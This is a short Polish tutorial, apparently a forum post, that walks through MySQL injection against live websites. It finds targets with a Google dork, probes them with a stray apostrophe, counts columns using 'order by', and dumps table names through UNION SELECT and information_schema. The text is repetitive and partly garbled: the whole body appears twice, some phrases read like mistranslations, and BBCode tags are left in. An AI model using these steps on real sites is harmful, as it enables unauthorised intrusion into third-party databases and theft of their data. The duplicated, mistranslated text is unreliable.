Witam postaram się obdarzyć was wiedzą MYSQL INJECTION.
No to jedziemy musimy zacząć od szukania frazy w google, ***.php?id=***
Wybierz coś chcesz, wiemy jedno jest wspólne news.php?
a w praktyce wygląda to tak: inurl:news.php?id=18
Ok, teraz zaczynamy otwieramy witrynę,
Aby sprawdzić, czy witryna jest podatna czy też nie, należy umieścić ' po numerze.
Jeśli jakiś tekst zniknie lub pojawi się błąd, wiemy że witryna jest podatna.
Przykład z: news.php?Id=18
Po wpisaniu: news.php?id=18'
Dobrze więc mamy błąd. Oznacza to, że jest zagrożenie
Tak więc, musimy dowiedzieć się, jak wiele "kolumn" jest na miejscu, do tego dodajemy za "zamówienie 1-" na koniec.
Wygląda to tak: /news.php?id=18 order by 1--
Tekst ładuje się normalnie, tak musimy zwiększać liczby o 1 za każdym razem do błędu aż tekst zniknie.
Ok, więc się błąd w kolejności przez 13 --
Jeżeli zadalibyśmy "poprzez 12 -" tekst ładuje normalnie. Dlatego też witryna ma 12 kolumn.
Dobrze teraz musimy w miejscu wyświetlanych kolumn dopisać union select dokładnie to będzie tak
"/news.php?id=-18 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12--" my już wiemy że to jest 12 ale do innych stron raczej tak nie będzie musicie wszystko badać sami
Teraz musimy sobie pomóc i uzyskać dane z bazy danych mysql poniżej prezentacja na zdjęciu
Ok, więc jest wersja 5. Jest to bardzo dobre dla nas, jak w wersji 5 spowodować wyświetlenie nazwy tabel, kolumn nazwiska, imiona i wiersz
Więc teraz mamy listę tabel z bazy danych.
to na tyle dziękuję za uwagę myślę że pomogłem
No to jedziemy musimy zacząć od szukania frazy w google, ***.php?id=***
Wybierz coś chcesz, wiemy jedno jest wspólne news.php?
a w praktyce wygląda to tak: inurl:news.php?id=18
Ok, teraz zaczynamy otwieramy witrynę,
Aby sprawdzić, czy witryna jest podatna czy też nie, należy umieścić ' po numerze.
Jeśli jakiś tekst zniknie lub pojawi się błąd, wiemy że witryna jest podatna.
Przykład z: news.php?Id=18
Po wpisaniu: news.php?id=18'
Dobrze więc mamy błąd. Oznacza to, że jest zagrożenie
Tak więc, musimy dowiedzieć się, jak wiele "kolumn" jest na miejscu, do tego dodajemy za "zamówienie 1-" na koniec.
Wygląda to tak: /news.php?id=18 order by 1--
Tekst ładuje się normalnie, tak musimy zwiększać liczby o 1 za każdym razem do błędu aż tekst zniknie.
Ok, więc się błąd w kolejności przez 13 --
Jeżeli zadalibyśmy "poprzez 12 -" tekst ładuje normalnie. Dlatego też witryna ma 12 kolumn.
Dobrze teraz musimy w miejscu wyświetlanych kolumn dopisać union select dokładnie to będzie tak
"/news.php?id=-18 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12--" my już wiemy że to jest 12 ale do innych stron raczej tak nie będzie musicie wszystko badać sami
Teraz musimy sobie pomóc i uzyskać dane z bazy danych mysql poniżej prezentacja na zdjęciu
Ok, więc jest wersja 5. Jest to bardzo dobre dla nas, jak w wersji 5 spowodować wyświetlenie nazwy tabel, kolumn nazwiska, imiona i wiersz
group_concat(table_name)[/b]
+from+information_schema.tables+where+table_schema=database()--[/b]
Więc teraz mamy listę tabel z bazy danych.
to na tyle dziękuję za uwagę myślę że pomogłem